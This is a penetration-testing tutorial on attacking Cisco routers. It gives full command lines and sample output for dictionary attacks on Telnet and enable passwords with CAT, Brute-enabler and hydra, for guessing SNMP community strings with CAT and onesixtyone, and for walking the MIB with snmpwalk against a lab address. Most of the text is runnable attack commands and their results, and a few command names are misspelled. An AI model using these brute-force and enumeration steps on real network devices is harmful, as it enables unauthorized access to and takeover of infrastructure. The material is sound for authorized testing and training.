CISCO Penetration Testing - Password Guessing/SNMP Attacks

• CAT (Cisco Auditing Tool)

This tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

./CAT -h <IP> -a password.wordlist

BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a /tmp/dict.txt
Cisco Auditing Tool - g0ne [null0]
Checking Host: 10.1.1.175

Guessing passwords:
Invalid Password: 1234
Invalid Password: 2read
Invalid Password: 4changes
Password Found: telnet
Invalid Password: CISCO
Invalid Password: IBM

• Brute-enabler

Brute-enabler is an internal enable password guesser. You require valid non-privilege mode credentials to use this tool, they can be either SSH or Telnet.

./enabler <IP> [-u username] -p password /password.wordlist [port]

BT brute-enable-v.1.0.2 # ./enabler 10.1.1.175 telnet /tmp/dict.txt

[`] enabler.
[`] cisco internal bruteforcer. concept by anyone
[`] coded by norby
[`]
[`] only password needed. sending [telnet]
[`] seems we are logged in :)
[`] telnet... wrong password
[`] CISCO... wrong password
[`] IBM... wrong password
[`] OrigEquipMfr... wrong password
[`] Cisco... wrong password
[`] agent... wrong password
[`] all... wrong password
[`] possible password found: cisco

• hydra

Hydra is a multi-functional password guessing tool. It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet which may only require a password.

Make sure that you limit the threads to 4 (-t 4) as it will just overload the Telnet server!

BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10
[DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59), ~14 tries per task
[DATA] attacking service cisco on port 23
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21673 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21670 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21673 was disconnected - exiting
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21672 terminating, can not connect
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21707 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
[STATUS] attack finished for 10.1.1.175 (waiting for childs to finish)
[23][cisco] host: 10.1.1.175 login: password: telnet
Hydra (http://www.thc.org) finished at 2007-02-26 10:54:23

• CAT (Cisco Auditing Tool)

This tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

./CAT -h <IP> -w SNMP.wordlist

BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -w /tmp/snmp.txt
Cisco Auditing Tool - g0ne [null0]

Checking Host: 10.1.1.175
Guessing passwords:
Invalid Password: cisco
Invalid Password: ciscos
Invalid Password: cisco1

Guessing Community Names:
Invalid Community Name: CISCO
Invalid Community Name: IBM
Invalid Community Name: OrigEquipMfr
Community Name Found: Cisco
Invalid Community Name: SNMP

• Onesixtyone

onesixtyone is a reliable SNMP community string guesser. Once it identifies the correct community string, it will display accurate fingerprinting information.

onesixytone -c SNMP.wordlist <IP>

BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

• snmpwalk

snmpwalk is part of the SNMP toolkit. After a valid community string is identified, you should use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information. Ensure that you get the correct version of SNMP protocol in use or it will not work correctly. It may be a good idea to redirect the output to a text file for easier viewing as the tool outputs a large amount of text.

snmapwalk -v <Version> -c <Community string> <IP>

BT# snmpwalk -v 1 -c enable 10.1.1.1
SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software
IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Fri 12-Aug
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: router
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 78
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00
IF-MIB::ifNumber.0 = INTEGER: 4